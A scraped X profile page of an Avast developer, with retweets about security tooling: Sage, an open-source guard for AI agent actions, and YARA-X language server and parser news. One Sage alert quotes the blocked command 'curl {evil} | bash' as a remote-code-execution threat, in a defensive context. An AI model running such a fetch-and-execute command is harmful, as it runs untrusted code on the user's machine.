Marek Milkovič

318 posts

Marek Milkovič

Marek Milkovič

@dev_metthal

Dev at Avast Software. Interested in C++, reverse engineering, compilers and game dev.

Brno, Czech Republic Sumali Ocak 2016
325 Sinusundan226 Mga Tagasunod
Marek Milkovič nag-retweet
Jakub Kroustek
Jakub Kroustek@JakubKroustek·
🛡️ 𝗦𝗮𝗴𝗲 𝗯𝘆 𝗚𝗲𝗻 𝗗𝗶𝗴𝗶𝘁𝗮𝗹: 𝗧𝗵𝗿𝗲𝗮𝘁 𝗕𝗹𝗼𝗰𝗸𝗲𝗱 🛡️ 🚨━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 🚨 𝗧𝗵𝗿𝗲𝗮𝘁 Remote code execution via curl pipe to shell 𝗦𝗲𝘃𝗲𝗿𝗶𝘁𝘆 CRITICAL 𝗔𝗿𝘁𝗶𝗳𝗮𝗰𝘁 curl {evil} | bash AI agents do crazy things - with full access to your machine, data, sometimes even finance. We built an open-source security solution that sits inside the agent and checks every action before it runs. Open-sourced under the Apache 2.0 license 200+ detection rules and heuristics under the Detection-Rule-License (DRL) by @cyb3rops Support for @claudeai (@bcherny), @cursor_ai, @openclaw... Try it. Break it. Tell us what's missing. github.com/avast/sage
Jakub Kroustek tweet media
English
2
13
54
9.1K
Marek Milkovič nag-retweet
Gen Threat Labs
Gen Threat Labs@GenThreatLabs·
Another Gen contribution to YARA-X upstream thanks to Albert Tikaiev (github.com/prosperritty): A YARA-X Language Server integrated directly into the YARA-X ecosystem, built on the error-tolerant parser started by Tomas Duris (github.com/TommYDeeee). It all started in 2017 with yaramod (github.com/avast/yaramod), an alternative YARA parser we built for linters and static analysis tools. Back then, we didn't even know what a language server was. After several years of iteration, in 2022 we released the first #YARA language server (YLS) on our GitHub (github.com/avast/yls), made by @KastakMatej, though it lived outside the YARA ecosystem. With YARA-X, we saw an opportunity for a unified ecosystem containing all the tooling we've been building and open-sourcing over the years. After adding the error-tolerant parser built on rowan in 2024, the language server was the natural next step. We're grateful @plusvic was open to the idea, accepted it upstream, and even improved it. This isn't our final stop. We'll continue helping build an even stronger YARA-X toolkit. Stay tuned!
Victor M. Alvarez@plusvic

I'm happy to introduce the official YARA language server for Visual Studio Code. virustotal.github.io/yara-x/blog/in… Many thanks to Albert Tikaiev for putting the first stone in this initative (github.com/prosperritty)

English
3
8
18
3.1K
Marek Milkovič nag-retweet
Victor M. Alvarez
Victor M. Alvarez@plusvic·
YARA-X is not only a pattern matching tool You can use it for extracting useful information from multiple file formats, including PE, .NET, ELF, Mach-O and LNK. virustotal.github.io/yara-x/blog/ya…
English
0
16
65
6.4K
Marek Milkovič
Marek Milkovič@dev_metthal·
@wxs @notareverser @plusvic @Qutluch But in the end, I think it's manageable effort. Stuff can't deviate from the standard too much and I think the areas where it can deviate were covered in the previous implementation or were quite quickly found with the new implementation.
English
0
0
1
189
Marek Milkovič
Marek Milkovič@dev_metthal·
@wxs @notareverser @plusvic @Qutluch The fact that there are multiple RFCs written on this helps a lot but as usual with standards, it becomes a recommendation for some implementations. I haven't realized how many workarounds OpenSSL contains for these cases until we started to dig in it with @plusvic. It's a mess.
English
1
0
1
95
Marek Milkovič nag-retweet
Gen Threat Labs
Gen Threat Labs@GenThreatLabs·
🚀Exciting News! 🚀 Introducing GenRex🦖: Our latest open-source project revolutionizing regular-expression generation from behavioral reports. Craft powerful regexes directly usable in YARA rules with ease! More in our blog post: engineering.avast.io/know-your-yara… #GenRex #OpenSource #YARA
English
0
19
40
5.5K